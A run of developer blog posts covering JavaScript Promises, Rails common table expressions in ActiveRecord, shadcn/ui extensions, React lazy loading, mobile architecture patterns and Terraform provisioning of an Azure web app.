on this section: - If a promise is resolved, `.then` will take over the rest. - If a promise is rejected, `.catch` will take over and return the error. - `.finally` is good for performing cleanup as it works no matter the promise is resolved and rejected. --- Alright, these are the basics of Promises! In the next article, we'll talk more about chaining promises and fetching multiple promises! Here's a quick glimpse using Promise chain from our callback example: ```javascript chooseCoffee() .then(order => placeOrder(order)) .then(coffee => drinkCoffee(coffee)) .catch(failureCallback); ``` ## Resources: 🌟 Highly Recommend: [Promise](https://javascript.info/promise-basics) (javascript.info) 🌟 Eloquent JavaScript Chapter 11: Asynchronous Programming 🌟 JavaScript The Definitive Guide by David Flanagan (7th Edition) Chapter 13.2: Promises (Pg. 346 - 367) ([Amazon](https://www.amazon.com/_/dp/1491952024?tag=oreilly20-20)) 🌟 [Graceful asynchronous programming with Promises](https://developer.mozilla.org/en-US/docs/Learn/JavaScript/Asynchronous/Promises) (MDN) 🌟 [JavaScript Async/Await Tutorial – Learn Callbacks, Promises, and Async/Await in JS by Making Ice Cream 🍧🍨🍦](https://www.freecodecamp.org/news/javascript-async-await-tutorial-learn-callbacks-promises-async-await-by-making-icecream/) (FreeCodeCamp) 🌟 [How To Implement Promises in JavaScript?](https://www.edureka.co/blog/how-to-implement-promises-in-javascript/#ConsumersinPromisesinthen()) 🦄 If you are looking for more explanation (or a different way of explaining) on this concept, I'd like to recommend my friend, Arpita Pandya's article: [JavaScript Promises](https://arpitapandya.medium.com/javascript-promises-dc4615e487b)
mehmehmehlol
1,906,052
Making Common Table Expression SQL More Railsy
In our last episode, I talked about using the common table expression syntax to make a query run...
0
2024-06-30T22:53:39
https://dev.to/mdchaney/making-common-table-expression-sql-more-railsy-363j
postgres, rails
In our [last episode](https://dev.to/mdchaney/inserting-and-selecting-new-records-one-query-2m4), I talked about using the common table expression syntax to make a query run much faster and allow me to insert and query the new records at the same time. Starting in Rails 7.1, it's now possible to add common table expressions to ActiveRecord relations. I can rewrite the query to use some of the good parts of ActiveRecord and hopefully make the code a little more readable. As a reminder, I'm working with these three tables: ```ruby class RawRoyaltyRecord < ApplicationRecord belongs_to :royalty_input_batch_partial belongs_to :track has_many :raw_royalty_records_sales end class RoyaltyInputBatchPartial < ApplicationRecord belongs_to :pro has_many :raw_royalty_records end class RawRoyaltyRecordsSale < ApplicationRecord belongs_to :raw_royalty_record belongs_to :sale end ``` Ultimately, this is the big SQL query that inserts the new records and returns them: ```sql WITH eligible_records AS ( -- This gets a list of existing track_id, customer, and sale_ids SELECT DISTINCT rrr.track_id, LOWER(rrr.customer) AS lower_customer, rrrs.sale_id FROM raw_royalty_records rrr INNER JOIN royalty_input_batch_partials ribp ON ribp.id = rrr.royalty_input_batch_partial_id INNER JOIN raw_royalty_records_sales rrrs ON rrrs.raw_royalty_record_id = rrr.id WHERE ribp.pro_id = 960 AND rrr.track_id IS NOT NULL ), inserted_records AS ( INSERT INTO raw_royalty_records_sales (raw_royalty_record_id, sale_id, created_at, updated_at) SELECT DISTINCT rr.id, er.sale_id, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP FROM raw_royalty_records rr INNER JOIN royalty_input_batch_partials ribp ON rr.royalty_input_batch_partial_id = ribp.id LEFT OUTER JOIN raw_royalty_records_sales rrs ON rrs.raw_royalty_record_id = rr.id INNER JOIN eligible_records er ON er.track_id = rr.track_id and er.lower_customer = LOWER(rr.customer) WHERE ribp.pro_id = 960 AND rrs.id IS NULL AND rr.track_id IS NOT NULL RETURNING * ) SELECT ir.raw_royalty_record_id, ir.sale_id, rrr.track_id, rrr.customer FROM inserted_records ir INNER JOIN raw_royalty_records rrr ON rrr.id=ir.raw_royalty_record_id ``` The only piece of information that I need to pass in there is the pro_id, which is "960" in the example. It would be easy to use to use `select_all` in my Ruby code to accomplish this, but using ActiveRecord will be fun. There is, however, one interesting limitation with ActiveRecord. I have to somehow base this entire query on a table if I want to be able to use the various methods to build the query. It's not a problem here because our actual query pulls from `raw_royalty_records`. I just need to add a join with the CTE `inserted_records` from above. One other issue is that the CTEs need to be somehow built. The first one is pretty straightforward. But the second one is a weird insert and all that, I'm going to be creating some hand-coded SQL there or something. Putting together a query like this requires starting from the end. Here's the final query: ```sql SELECT ir.raw_royalty_record_id, ir.sale_id, rrr.track_id, rrr.customer FROM inserted_records ir INNER JOIN raw_royalty_records rrr ON rrr.id=ir.raw_royalty_record_id ``` Let's change that around so that we're pulling from `raw_royalty_records`: ```sql SELECT rrr.id, ir.sale_id, rrr.track_id, rrr.customer FROM raw_royalty_records rrr INNER JOIN inserted_records it ON rrr.id=ir.raw_royalty_record_id ``` Now, we can use ActiveRecord to build this: ```ruby query = RawRoyaltyRecord.joins("INNER JOIN inserted_records on inserted_records.raw_royalty_record_id = raw_royalty_records.id") ``` Of course, that's invalid as-is because "inserted_records" isn't a table. But if I look at the generated SQL using the `to_sql` method, we're on the right track: ```sql SELECT "raw_royalty_records".* FROM "raw_royalty_records" INNER JOIN inserted_records on inserted_records.raw_royalty_record_id = raw_royalty_records.id ``` So, we need to add our CTEs to this query, and we do that using the `with` method. We can add them both at the same time, but I'm going to do one at a time because they're different and we need to look at those differences. Here's the first CTE: ```sql WITH eligible_records AS ( SELECT DISTINCT rrr.track_id, LOWER(rrr.customer) AS lower_customer, rrrs.sale_id FROM raw_royalty_records rrr INNER JOIN royalty_input_batch_partials ribp ON ribp.id = rrr.royalty_input_batch_partial_id INNER JOIN raw_royalty_records_sales rrrs ON rrrs.raw_royalty_record_id = rrr.id WHERE ribp.pro_id = 960 AND rrr.track_id IS NOT NULL ) ``` Turns out, we can use standard ActiveRecord to put this together. ```ruby eligible_records_query = RawRoyaltyRecord .joins(:royalty_input_batch_partial) .where("royalty_input_batch_partials.pro_id": 960) .joins(:raw_royalty_records_sales) .where("raw_royalty_records.track_id is not null") .select(:track_id, "LOWER(raw_royalty_records.customer) AS lower_customer", "raw_royalty_records_sales.sale_id") .distinct ``` With that, we can add it as a CTE to our query: ```ruby query = query.with(eligible_records: eligible_records_query) ``` It's actually really cool to be able to see this work in parts, and common table expressions built this way allow us to easily break the query up and test the individual parts. The query above stands on its own. But how can we test it as a CTE? Our original giant query had two CTEs as you may recall, with the second one being the insert. But we can pull it apart and use the `select` part of it to see this query working as a CTE. But, first, let's make it really simple. Here's the simplest way you can test a CTE: ```sql WITH eligible_records AS ( -- This gets a list of existing track_id, customer, and sale_ids SELECT DISTINCT rrr.track_id, LOWER(rrr.customer) AS lower_customer, rrrs.sale_id FROM raw_royalty_records rrr INNER JOIN royalty_input_batch_partials ribp ON ribp.id = rrr.royalty_input_batch_partial_id INNER JOIN raw_royalty_records_sales rrrs ON rrrs.raw_royalty_record_id = rrr.id WHERE ribp.pro_id = 960 AND rrr.track_id IS NOT NULL ) SELECT * FROM eligible_records; ``` How do we rubyize this? Not easily, because `eligible_records` doesn't exist outside of this query. But let's revisit the original giant query, specifically the second CTE: ```sql inserted_records AS ( INSERT INTO raw_royalty_records_sales (raw_royalty_record_id, sale_id, created_at, updated_at) SELECT DISTINCT rr.id, er.sale_id, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP FROM raw_royalty_records rr INNER JOIN royalty_input_batch_partials ribp ON rr.royalty_input_batch_partial_id = ribp.id LEFT OUTER JOIN raw_royalty_records_sales rrs ON rrs.raw_royalty_record_id = rr.id INNER JOIN eligible_records er ON er.track_id = rr.track_id and er.lower_customer = LOWER(rr.customer) WHERE ribp.pro_id = 960 AND rrs.id IS NULL AND rr.track_id IS NOT NULL RETURNING * ) ``` Let's chop out the `select` statement and use it as the primary query to find some `raw_royalty_records`: ```sql WITH eligible_records AS ( -- This gets a list of existing track_id, customer, and sale_ids SELECT DISTINCT rrr.track_id, LOWER(rrr.customer) AS lower_customer, rrrs.sale_id FROM raw_royalty_records rrr INNER JOIN royalty_input_batch_partials ribp ON ribp.id = rrr.royalty_input_batch_partial_id INNER JOIN raw_royalty_records_sales rrrs ON rrrs.raw_royalty_record_id = rrr.id WHERE ribp.pro_id = 960 AND rrr.track_id IS NOT NULL ) SELECT DISTINCT rrr.id, er.sale_id, rrr.customer FROM raw_royalty_records rrr INNER JOIN royalty_input_batch_partials ribp ON rrr.royalty_input_batch_partial_id = ribp.id LEFT OUTER JOIN raw_royalty_records_sales rrs ON rrs.raw_royalty_record_id = rrr.id INNER JOIN eligible_records er ON er.track_id = rrr.track_id and er.lower_customer = LOWER(rrr.customer) WHERE ribp.pro_id = 960 AND rrs.id IS NULL AND rrr.track_id IS NOT NULL ``` That's a simplified version of the original giant query which will give us a list of `raw_royalty_record` ids along with `sales` ids. While we're at it, we'll grab the customer as well so we can see what's matching up. Now, with the query in this shape, it's time to Rubyize it. We already have the CTE Rubyized, let's work on the main query. With `ActiveRecord`, we have to start from a model. For this, we're pulling in ids from two different tables, but `raw_royalty_records` is the primary. I'll base this on `RawRoyaltyRecord`: ```ruby # See above for "eligible_records_query" query = RawRoyaltyRecord .joins(:royalty_input_batch_partial) .where("royalty_input_batch_partials.pro_id": 960) .joins("INNER JOIN eligible_records ON eligible_records.track_id = raw_royalty_records.track_id AND eligible_records.lower_customer = LOWER(raw_royalty_records.customer)") .left_joins(:raw_royalty_records_sales) .where("raw_royalty_records_sales.id is null") .where("raw_royalty_records.track_id is not null") .with(eligible_records: eligible_records_query) .select("raw_royalty_records.id", "eligible_records.sale_id", "raw_royalty_records.customer") .distinct ``` At this point, there's an argument that can be made that the Ruby code is more complicated than the SQL. And, in a way, it is. But it also is safe since we're bringing in a possibly dangerous parameter (the `pro_id` of "960) and still takes care of a lot of the grunt work of joining tables and all that. I think that it's easier to read. But those are opinions, nothing more. Back to the original issue - How do I automatically add these records in a CTE and then get them back out? Is it worth the trouble? Let's figure out how to do it first. The issue that we have is that the main query above needs to be changed: 1. remove "customer" as it won't be needed 2. add created_at and updated_at 3. remove the now-extraneous `with` as I'll keep them both at top level At that point, it'll be ready to insert into `raw_royalty_records_sales`. The problem is that it's difficult to turn the select into an insert using standard `ActiveRecord`. Again, here's the part of the query that performs the `insert` and `select` as a common table expression: ```sql INSERT INTO raw_royalty_records_sales (raw_royalty_record_id, sale_id, created_at, updated_at) SELECT DISTINCT rr.id, er.sale_id, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP FROM raw_royalty_records rr INNER JOIN royalty_input_batch_partials ribp ON rr.royalty_input_batch_partial_id = ribp.id LEFT OUTER JOIN raw_royalty_records_sales rrs ON rrs.raw_royalty_record_id = rr.id INNER JOIN eligible_records er ON er.track_id = rr.track_id and er.lower_customer = LOWER(rr.customer) WHERE ribp.pro_id = 960 AND rrs.id IS NULL AND rr.track_id IS NOT NULL RETURNING * ``` This is basically the same `select` as above, only it's in the CTE. We can make this work. Let's start with the final query. Ultimately, I'm going to pull in this information, which I'm just using to log the transaction: ```sql SELECT rrr.id, ir.sale_id, rrr.track_id, rrr.customer FROM raw_royalty_records rrr INNER JOIN inserted_records it ON rrr.id=ir.raw_royalty_record_id ``` This is a denormalized list of sales, tracks, and customers from the `raw_royalty_records` and friends tables (it's possible for one `raw_royalty_record` to be tied to multiple sales because the reporting doesn't give enough information sometimes). ```ruby select_for_insert_query = RawRoyaltyRecord .joins(:royalty_input_batch_partial) .where("royalty_input_batch_partials.pro_id": 960) .joins("INNER JOIN eligible_records ON eligible_records.track_id = raw_royalty_records.track_id AND eligible_records.lower_customer = LOWER(raw_royalty_records.customer)") .left_joins(:raw_royalty_records_sales) .where("raw_royalty_records_sales.id is null") .where("raw_royalty_records.track_id is not null") .select("raw_royalty_records.id AS raw_royalty_record_id", "eligible_records.sale_id AS sale_id", "CURRENT_TIMESTAMP AS created_at", "CURRENT_TIMESTAMP AS updated_at") .distinct ``` This is maybe a little ugly, but I can take the SQL from that, wrap it with `INSERT INTO...RETURNING *`, and I've got a CTE. One note here - the CTE cannot just be a string. In this case, we'll just have to wrap the string in `Arel.sql`: ```ruby insert_query = Arel.sql( "INSERT INTO raw_royalty_records_sales (raw_royalty_record_id, sale_id, created_at, updated_at)\n" + select_for_insert_query.to_sql + "\nRETURNING *" ) ``` With that, I can add both CTEs to a basic query. I'll call that one "inserted_records". ```ruby query = RawRoyaltyRecord.joins(" INNER JOIN inserted_records ON inserted_records.raw_royalty_record_id = raw_royalty_records.id ") .select("raw_royalty_records.id", "inserted_records.sale_id", "raw_royalty_records.track_id", "raw_royalty_records.customer") .distinct .with( eligible_records: eligible_records_query, inserted_records: insert_query ) ``` And with that, this monstrosity works. ```sql WITH "eligible_records" AS (SELECT DISTINCT "raw_royalty_records"."track_id", LOWER(raw_royalty_records.customer) AS lower_customer, "raw_royalty_records_sales"."sale_id" FROM "raw_royalty_records" INNER JOIN "royalty_input_batch_partials" ON "royalty_input_batch_partials"."id" = "raw_royalty_records"."royalty_input_batch_partial_id" INNER JOIN "raw_royalty_records_sales" ON "raw_royalty_records_sales"."raw_royalty_record_id" = "raw_royalty_records"."id" WHERE "royalty_input_batch_partials"."pro_id" = 960 AND (raw_royalty_records.track_id is not null)), "inserted_records" AS (INSERT INTO raw_royalty_records_sales (raw_royalty_record_id, sale_id, created_at, updated_at) WITH "eligible_records" AS (SELECT DISTINCT "raw_royalty_records"."track_id", LOWER(raw_royalty_records.customer) AS lower_customer, "raw_royalty_records_sales"."sale_id" FROM "raw_royalty_records" INNER JOIN "royalty_input_batch_partials" ON "royalty_input_batch_partials"."id" = "raw_royalty_records"."royalty_input_batch_partial_id" INNER JOIN "raw_royalty_records_sales" ON "raw_royalty_records_sales"."raw_royalty_record_id" = "raw_royalty_records"."id" WHERE "royalty_input_batch_partials"."pro_id" = 960 AND (raw_royalty_records.track_id is not null)) SELECT DISTINCT raw_royalty_records.id AS raw_royalty_record_id, eligible_records.sale_id AS sale_id, CURRENT_TIMESTAMP AS created_at, CURRENT_TIMESTAMP AS updated_at FROM "raw_royalty_records" INNER JOIN "royalty_input_batch_partials" ON "royalty_input_batch_partials"."id" = "raw_royalty_records"."royalty_input_batch_partial_id" LEFT OUTER JOIN "raw_royalty_records_sales" ON "raw_royalty_records_sales"."raw_royalty_record_id" = "raw_royalty_records"."id" INNER JOIN eligible_records ON eligible_records.track_id = raw_royalty_records.track_id AND eligible_records.lower_customer = LOWER(raw_royalty_records.customer) WHERE "royalty_input_batch_partials"."pro_id" = 960 AND (raw_royalty_records_sales.id is null) AND (raw_royalty_records.track_id is not null) RETURNING *) SELECT DISTINCT "raw_royalty_records"."id", "inserted_records"."sale_id", "raw_royalty_records"."track_id", "raw_royalty_records"."customer" FROM "raw_royalty_records" INNER JOIN inserted_records ON inserted_records.raw_royalty_record_id = raw_royalty_records.id ``` But is it worth it? I can short-cut this and return the `raw_royalty_records_sales`, or I can do it the way I've done it above. All I want the records for is to log them, and my preference is to log them in the format: track id (and maybe title) customer list of new raw_royalty_record ids list of sale ids (and maybe the customer info attached to the sales for confirmation) Given the denormalized nature of the data, I'm still going to have to do some magic in Ruby to get this log format. I could simply use `pluck` to pull the somewhat raw data out and handle it myself. The cool thing about using the railsy way of building these queries is that I can swap `raw_royalty_records` out for `raw_royalty_records_sales` easily: ```ruby query = RawRoyaltyRecordsSale .from("inserted_records") .joins("INNER JOIN raw_royalty_records ON raw_royalty_records.id=inserted_records.raw_royalty_record_id") .select("inserted_records.id", "inserted_records.raw_royalty_record_id", "inserted_records.sale_id", "raw_royalty_records.track_id", "raw_royalty_records.customer") .distinct .with( eligible_records: eligible_records_query, inserted_records: insert_query ) ``` One issue with this is that - regardless of how I do it - `find_each` is not going to work here. So I have to be realistic about the amount of data that I'm loading in. With the PRO that I'm testing with I have around 4000 created records. Not too many, definitely more than I want to risk an N+1 with. Plus, it's difficult to say how this may progress in the future as the database grows. Anyway, that's how to use a common table expression to insert new records while simultaneously instantiating objects based on them.
mdchaney
1,899,391
Top 5 Coolest shadcn/ui Extensions
Shadcn/ui is without a doubt the most popular component library. It become crazy popular in the...
0
2024-06-30T22:38:04
https://dev.to/dellboyan/top-5-coolest-shadcnui-extensions-4n7i
shadcn, nextjs, javascript, webdev
Shadcn/ui is without a doubt the most popular component library. It become crazy popular in the previous year or so. Nevertheless it's not perfect and doesn't cover all use cases. In this article we'll explore the most popular extensions I found to make this cool library even better. Let's begin. ## [1. Onborda](https://github.com/uixmat/onborda) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s82blfdm1fupoonn0rb3.png) Onborda is like finding a secret weapon for your onboarding process. This sleek extension takes the shadcn/ui framework and transforms it into a powerful tool for creating user onboarding experiences. The step-by-step flow builder is intuitive, making it a breeze to craft engaging welcome tours or feature introductions. What really shines is how seamlessly it integrates with existing shadcn/ui projects - you'd think it was part of the original library. While it's fantastic for straightforward onboarding flows, complex, highly customized sequences might require some extra elbow grease. For teams looking to elevate their user onboarding game without starting from scratch, Onborda is a gem that's worth its weight in conversions. Check out the Onborda demo [here](https://onborda.vercel.app/). ## [2. shadcn-ui-expansions](https://github.com/hsuanyi-chou/shadcn-ui-expansions) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/b98348tr7ee7glkuqs6t.png) Stumbled upon shadcn-ui-expansions while hunting for ways to beef up my shadcn/ui toolkit, and it's been a game-changer. This nifty package serves up a buffet of fresh components that play nice with the shadcn/ui ecosystem. The Date Time Picker and Infinite Scroll components are standout additions, filling gaps I was missing with shadcn. UI could use some improvement compared to the original but still follows the similar style. For devs looking to expand their shadcn/ui arsenal without reinventing the wheel, this extension is a solid bet, even if you might need to roll up your sleeves for some fine-tuning. Browse all components [here](https://shadcnui-expansions.typeart.cc/docs). ## [3. Emblor](https://github.com/JaleelB/emblor) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sunw1vsyfcau3eiwyorv.png) Emblor is a highly customizable, accessible, and fully-featured tag input component built with Shadcn UI. I recently worked on a project that required a component very similar to Emblor. Unfortunately, I didn't know about Emblor at that time, it could have saved me some time. Component looks great, you wouldn't even notice it doesn't come with shadcn by default and of course it's totally customizable. Check out the demo and docs on official website [here.](https://emblor.jaleelbennett.com/introduction) ## [4. File Vault](https://github.com/ManishBisht777/file-vault) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ociatd4uwwymzzxzx7u2.png) File Vault brings a much-needed file management solution to the shadcn/ui ecosystem. This extension offers a slick, drag-and-drop interface for handling file uploads, complete with progress tracking and error handling. The UI is clean and intuitive, staying true to shadcn's design ethos. While it excels at basic file operations, power users might find themselves wishing for more advanced features like batch processing or detailed metadata editing. Nevertheless, for developers looking to add polished file management capabilities to their shadcn/ui projects without reinventing the wheel, File Vault is a solid choice that can save countless hours of development time. ## [5. Minimal Tiptap Editor](https://github.com/Aslam97/shadcn-minimal-tiptap) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7ob3pu1y9wkgixxpcmns.png) Shadcn Minimal Tiptap brings the power of rich text editing to shadcn/ui with surprising elegance. This extension marries the robust Tiptap editor with shadcn's sleek design principles, resulting in a WYSIWYG editor that doesn't scream "I'm a third-party component!" The minimalist approach is refreshing, offering just enough formatting options without overwhelming users. It's a breeze to integrate, and the TypeScript support is top-notch. However, "minimal" is the operative word here - if you're after advanced features like collaborative editing or complex formatting, you might need to build on top of this foundation. For projects that need a clean, user-friendly text editor that plays nice with shadcn/ui, this Tiptap implementation hits the sweet spot between functionality and simplicity. You can check out the demo [here](https://shadcn-minimal-tiptap.vercel.app/). ## [Bonus: magicui](https://magicui.design) ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1tft7enm6klsiuas4dxy.png) While MagicUI is not a shadcn/ui extension, more like a competition, I had to include it because it's super cool. It takes the solid foundation of shadcn/ui and sprinkles it with a dash of, well, magic. This extension brings a suite of animated and interactive components that add flair to your UI without sacrificing the clean aesthetic shadcn/ui is known for. The hover effects and micro-interactions are particularly impressive, giving your app that extra polish that users subconsciously appreciate. It's not just eye candy though - the components are built with performance in mind, so you don't have to worry about bogging down your site. While the learning curve is gentle, power users might crave more granular control over animations. For developers looking to add that special something to their shadcn/ui projects without diving deep into animation code, MagicUI is like having a UX designer's touch at your fingertips. To work with me, contact me via [my website.](https://www.kodawarians.com/) [Also, let's connect on x.com ](https://x.com/DellBoyan)
dellboyan
1,904,045
Implementando Lazy Loading em Componentes React
Introdução Lazy loading é uma técnica de otimização que permite carregar componentes sob...
0
2024-06-30T22:37:37
https://dev.to/vitorrios1001/implementando-lazy-loading-em-componentes-react-49fg
javascript, tutorial, learning, react
### Introdução Lazy loading é uma técnica de otimização que permite carregar componentes sob demanda, apenas quando são necessários. Isso pode melhorar significativamente a performance de uma aplicação React, reduzindo o tempo de carregamento inicial e a quantidade de recursos baixados pelo navegador. Neste artigo, vamos explorar como implementar lazy loading em componentes React utilizando o recurso `React.lazy` e `Suspense`. ### Benefícios do Lazy Loading 1. **Redução do Tempo de Carregamento Inicial**: Carregar apenas os componentes essenciais na inicialização da aplicação reduz o tempo de carregamento. 2. **Melhoria na Performance**: Menos recursos são carregados inicialmente, resultando em uma aplicação mais rápida e responsiva. 3. **Melhoria na Experiência do Usuário**: Os componentes são carregados conforme o usuário navega pela aplicação, proporcionando uma experiência mais fluida. ### Pré-requisitos Para seguir este tutorial, você precisará de: - Conhecimento básico de React. - Um projeto React configurado. Se você ainda não tem um, pode criar um usando `create-react-app`. ### Passo 1: Configurando o Projeto Se você ainda não tem um projeto React, crie um usando `create-react-app`: ```bash npx create-react-app lazy-loading-example cd lazy-loading-example npm start ``` ### Passo 2: Criando Componentes para Lazy Loading Vamos criar alguns componentes de exemplo que serão carregados de forma preguiçosa. No diretório `src`, crie uma pasta chamada `components` e adicione dois componentes: `Home.js` e `About.js`. **Home.js**: ```jsx import React from 'react'; const Home = () => { return ( <div> <h1>Home Component</h1> <p>Welcome to the Home Page!</p> </div> ); }; export default Home; ``` **About.js**: ```jsx import React from 'react'; const About = () => { return ( <div> <h1>About Component</h1> <p>Welcome to the About Page!</p> </div> ); }; export default About; ``` ### Passo 3: Implementando Lazy Loading Agora, vamos modificar o `App.js` para usar lazy loading ao importar esses componentes. **App.js**: ```jsx import React, { Suspense } from 'react'; import { BrowserRouter as Router, Route, Switch, Link } from 'react-router-dom'; const Home = React.lazy(() => import('./components/Home')); const About = React.lazy(() => import('./components/About')); function App() { return ( <Router> <div> <nav> <ul> <li> <Link to="/">Home</Link> </li> <li> <Link to="/about">About</Link> </li> </ul> </nav> <Suspense fallback={<div>Loading...</div>}> <Switch> <Route exact path="/" component={Home} /> <Route path="/about" component={About} /> </Switch> </Suspense> </div> </Router> ); } export default App; ``` ### Explicação 1. **React.lazy**: Utilizamos `React.lazy` para carregar os componentes `Home` e `About` de forma preguiçosa. Isso significa que esses componentes só serão carregados quando forem necessários. 2. **Suspense**: Envolvemos nossas rotas com o componente `Suspense`, que exibe um fallback (`<div>Loading...</div>`) enquanto o componente preguiçoso está sendo carregado. 3. **Roteamento**: Utilizamos `react-router-dom` para gerenciar a navegação entre os componentes `Home` e `About`. ### Passo 4: Testando a Implementação Para testar a implementação, execute o comando `npm start` para iniciar o servidor de desenvolvimento. Navegue entre as páginas Home e About para ver o efeito do lazy loading. ```bash npm start ``` ### Conclusão Implementar lazy loading em componentes React é uma maneira eficaz de melhorar a performance da sua aplicação, reduzindo o tempo de carregamento inicial e carregando componentes sob demanda. Neste artigo, aprendemos como usar `React.lazy` e `Suspense` para implementar lazy loading de forma simples e eficiente. ### Benefícios Desta Abordagem 1. **Performance Melhorada**: A aplicação carrega mais rapidamente e utiliza menos recursos inicialmente. 2. **Eficiência**: Apenas os componentes necessários são carregados, economizando largura de banda e tempo. 3. **Experiência de Usuário Melhorada**: A navegação se torna mais fluida e responsiva, com menos tempo de espera para o carregamento de componentes. Você pode explorar mais sobre lazy loading e outras técnicas de otimização para React na documentação oficial do React: [React Documentation](https://react.dev/reference/react/lazy). Espero que este artigo tenha sido útil para você. Se tiver alguma dúvida ou sugestão, sinta-se à vontade para comentar!
vitorrios1001
1,906,975
Mobile Development Platforms and Arcitecture patterns
We have different platforms that programmers use to develop scalable and efficient projects for...
0
2024-06-30T22:34:15
https://dev.to/walerick/mobile-development-platforms-and-arcitecture-patterns-aal
We have different platforms that programmers use to develop scalable and efficient projects for mobile. Below are different mobile development patterns and their usefulness - **Native Development** : There are two categories for these platforms namely 1. IOS- can bedeveloped with swift or objective-c in Xcode. 2. Android - can be developed using kotlin or Java in Android Studio. - **Cross-Platform Development**: There are quite a few platforms under this category namely 1. Flutter- Uses Dart Language. 2. React Native- Uses Javascript and React. 3. Xamarin - Uses C# and .NET 4. Ion - Uses simple web technologies (html, Css and Js). - **Hybrid Development** : 1. Cardova - Uses Html, CSS and JavaScript. 2. Capacitor - Modern alternative to Cardova. ## Common Software Arcitecture Pattern with their Pros and Cons 1. **MVC(Model-View-Controller)**: - Model: Manages data and business logic. - View: Manages the display and user interface. - Controller: Acts as an intermediary between Model and View, handling user input and updating the view accordingly. **Pros**: Separation of Concerns: Clear division between the application's data, UI, and logic. Reusability: Models and Views can be reused across different parts of the application. **Cons**: - Overhead in Small Applications: For simple apps, MVC can add unnecessary complexity. - Complex Controller Logic: Controllers can become overloaded with logic, leading to "Massive View Controller" in iOS development. 1. **MVP (Model-View-Presenter)** : - Model: Manages the data and business logic. - View: A passive interface that displays data and routes user interactions to the Presenter. - Presenter: Handles all the UI logic and communicates between Model and View, making the View more passive. **Pros:** Improved Testability: Presenters can be tested independently from the Views, enhancing unit test coverage. Decoupled View Logic: Views are simpler and more focused on rendering data, reducing the risk of complex, monolithic components. Flexible Views: Easier to swap out or change Views without affecting business logic. **Cons:** Boilerplate Code: Can lead to a significant amount of boilerplate, especially in large applications. Presenter Complexity: Presenters can become overly complex as they take on more responsibilities. Maintenance Overhead: Managing interactions between multiple Presenters and Views can become cumbersome. 3. **MVVM (Model-View-ViewModel)** - Model: Manages data and business logic. - View: Handles the display and binds to properties exposed by the ViewModel. - ViewModel: Acts as a mediator between Model and View, exposing data and handling most of the logic. **Pros:** Two-Way Data Binding: Enables automatic synchronization between the View and the ViewModel, reducing the need for boilerplate code. Enhanced Testability: ViewModels can be tested independently of the Views, promoting better test coverage. Separation of Concerns: Clearly separates UI logic from business logic, making the code more maintainable. **Cons:** Complex Data Binding: Managing data binding can become complex and difficult to debug, especially in larger applications. Performance Overhead: Extensive use of data binding may lead to performance issues due to frequent UI updates. Steeper Learning Curve: Understanding and properly implementing MVVM can be challenging for developers new to the pattern. **4. Clean Architecture** - Domain Layer: Contains the business logic. - Data Layer: Manages data sources and repositories. - Presentation Layer: Handles the UI and presentation logic. - Interface Adapters: Convert data between the different layers. **Pros:** Highly Scalable: Suitable for large, complex applications due to its modular structure. Testability: Each layer can be tested independently, ensuring thorough and effective testing. Independent Frameworks: The architecture is not tightly coupled to any framework, making it easier to switch or update technologies. **Cons:** Initial Complexity: Setting up and understanding Clean Architecture can be daunting, especially for smaller teams or projects. Increased Development Time: The overhead of maintaining strict boundaries between layers can slow down the development process. Overkill for Simple Apps: May be excessive for small or simple applications due to its detailed and structured nature. Thanks for reading this far, I'm Voldemort a Software engineer. I accidentally bumped into a post about a free online internship program, [HNG](https://hng.tech/internship). There is also provision to be certified and enjoy [premium](https://hng.tech/premium) package.
walerick
1,906,962
IAC - Azure WebApp creation
Step1: Terraform provider section terraform { required_providers { azurerm...
26,072
2024-06-30T22:20:04
https://dev.to/learnwithsrini/iac-azure-webapp-creation-3nlo
azure, iac, terraform
**Step1:** Terraform provider section ``` terraform { required_providers { azurerm ={ source = "hashicorp/azurerm" version="3.17.0" } } } ``` **Step2:** Provider section of azurerm Refer to article to get mentioned details required to be provided in azurerm provider - https://dev.to/srinivasuluparanduru/azure-service-principal-creation-step-by-step-approach-2a46 ``` provider "azurerm" { subscription_id = "" tenant_id = "" client_id = "" client_secret = "" features { } } ``` **Step3:** Azure resource group creation ``` resource "azurerm_resource_group" "example" { name = "template-grp" location = "North Europe" } ``` **Step4:** Azure service plan ``` resource "azurerm_service_plan" "plan202407" { name = "plan202407" resource_group_name = azurerm_resource_group.example.name location = "North Europe" os_type = "Windows" sku_name = "F1" } ``` **Step5:** Creation of Azure web app ``` resource "azurerm_windows_web_app" "example" { name = "examplewebapp" resource_group_name = azurerm_resource_group.example.name location = azurerm_service_plan.example.location service_plan_id = azurerm_service_plan.example.id site_config { always_on = false application_stack { current_stack = "dotnet" dotnet_Version = "v6.0" } } depends_on= [ azurerm_service_plan.plan202407 ] } ``` References: 1.[Service Plan](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/service_plan) 2.[Azure webapp](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/windows_web_app) Conclusion : Creation of Azure webapp using IAC - Terraform 💬 If you enjoyed reading this blog post and found it informative, please take a moment to share your thoughts by leaving a review and liking it 😀 and follow me in [dev.to](https://dev.to/srinivasuluparanduru) , [linkedin ](https://www.linkedin.com/in/srinivasuluparanduru)
srinivasuluparanduru
1,906,961
Hello, DEV Community! I'm Makda Nebyu
Introduction Hello everyone! My name is Makda Nebyu. I’m a 3rd-year software engineering...
0
2024-06-30T22:16:34
https://dev.to/makda_nebyu_f886a8063bc9f/hello-dev-community-im-makda-nebyu-njb
devops, webdev, javascript, beginners
